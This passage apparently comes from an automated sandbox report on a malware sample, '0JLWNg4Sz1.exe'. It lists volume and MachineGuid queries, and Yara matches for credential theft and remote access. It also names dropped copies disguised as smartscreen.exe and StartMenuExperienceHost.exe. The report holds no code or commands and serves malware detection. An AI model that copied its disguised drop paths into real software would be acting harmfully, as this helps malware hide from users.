Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Queries volume information: C:\Users\user\Desktop\0JLWNg4Sz1.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Queries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe Queries volume information: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe VolumeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Recovery\StartMenuExperienceHost.exe Queries volume information: C:\Recovery\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Users\user\Desktop\0JLWNg4Sz1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match File source: 0JLWNg4Sz1.exe, type: SAMPLE
Source: Yara match File source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
Source: Yara match File source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED